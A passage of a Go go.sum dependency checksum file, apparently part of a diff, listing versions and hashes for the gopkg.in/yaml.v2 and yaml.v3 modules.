v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= +gopkg.in/yaml.v2 v2.2.3/go.mod 
h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=